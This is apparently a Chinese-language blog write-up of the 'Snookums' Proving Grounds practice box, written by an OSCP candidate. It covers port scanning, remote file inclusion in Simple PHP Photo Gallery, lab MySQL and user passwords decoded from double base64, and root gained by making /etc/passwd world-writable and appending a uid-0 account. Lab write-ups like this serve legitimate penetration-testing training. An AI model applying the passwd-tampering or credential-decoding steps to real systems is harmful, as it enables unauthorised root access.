前言
在未来将会持续更新Proving Grounds Practice内的靶机Write Up,近期本人也通过了OSCP考试,所以将打靶的所有笔记共享出来,所有的靶机推荐来源于以下链接:https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159
不过其中有一些机器已经不在Proving Grounds Practice中了,所以就没有了Write Up,本系列将有大约40台左右的机器,如果你在练习过程中遇到了困难,建议先自己进行挖掘,然后再查看Write Up,始终需要记得:Try Harder。
本文结构
一般来说本系列的Write Up将以以下的结构来进行
-
端口扫描 -
网页枚举或端口枚举 -
突破入口 -
特权提升
端口枚举
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
33060/tcp open mysqlx
针对性枚举
80
页面显示这是simple php photo gallery ,版本为v0.8
在Google当中搜索发现版本0.7有本地文件包含,并且在github中可以看到远程文件包含的信息。
接着尝试使用远程文件包含。
然后得到 simple php photo gallery的反弹shell.
PE
查看默认路径 www 来获得一些配置文件当中的信息
得到MySQL的密码, root:MalapropDoffUtilize1337。
登录到MySQL里面来获取更多的定西
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| SimplePHPGal |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.03 sec)
mysql> use SimplePHPGal;
use SimplePHPGal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+------------------------+
| Tables_in_SimplePHPGal |
+------------------------+
| users |
+------------------------+
1 row in set (0.00 sec)
mysql> select * from users;
select * from users;
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| josh | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== |
| serena | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== |
+----------+----------------------------------------------+
3 rows in set (0.01 sec)
现在得到了3个用户的密码,这三个用户的密码是双重base64加密,所以只需要进行双重base64解密即可。
john:MobilizeHissSeedtime747
michael:HockSydneyCertify123
serena:OverallCrestLean000
查看 /home目录, 只能看到michael 的文件夹,所以尝试使用Michael的密码来登录ssh。
查看 sudo -l, 但是Michael没有任何sudo的权限,所以执行 linpeas.sh。
系统信息
开放的端口
存在的用户
有用的软件
所有人都可以操作的文件
修改/etc/passwd的权限,然后新增一个用户
[michael@snookums ~]$ ls -al /etc/passwd
-rw-r--r--. 1 michael root 1162 Jun 22 2021 /etc/passwd
[michael@snookums ~]$ chmod 777 /etc/passwd
[michael@snookums ~]$ openssl passwd aaron
95tsH6n7MVWsM
[michael@snookums ~]$ echo "aaron3:95tsH6n7MVWsM:0:0:root:/root:/bin/bash" >> /etc/passwd
接着使用su来切换用户最终得到root。
END
OSCP(Offensive Security Certified Professional),中文称国际注册渗透测试专家认证,是由Offensive Security推出的200等级的证书,主要面向领域:渗透测试。
OSCP 证书是一种技术性证书,涵盖渗透测试和攻击技术方面。持有此证书的人员已通过对目标网络进行渗透测试并获得管理员访问权限的实际考试。该证书是由 Offense Security 出品,考试内容涉及网络渗透测试、漏洞挖掘、漏洞利用等方面。OSCP 考试难度较高,需要实际的技能和经验,持有此证书可证明持有人具有深入了解渗透测试及相关攻击技术的实际能力。
如果你觉得本篇文章对你有帮助,点个关注好不好呢,还可以点个在看,感谢你的支持:)))))))))))))
联系我
WeChat ID:wengchensmile
Email Address: [email protected](个人)
原文始发于微信公众号(Aaron与安全的那些事):Proving Grounds Practice-Snookums
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论